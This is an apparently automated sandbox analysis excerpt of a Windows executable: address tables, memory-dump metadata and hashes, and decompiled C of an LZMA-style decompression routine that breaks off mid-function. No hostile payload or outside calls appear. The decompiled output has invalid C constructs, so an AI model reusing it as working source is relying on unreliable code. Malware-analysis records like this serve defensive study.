                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00000000
                  0x0040673a
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004066bb
                  0x004066b8
                  0x00000000
                  0x004062ef

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                  • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                  • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                  • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406409 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
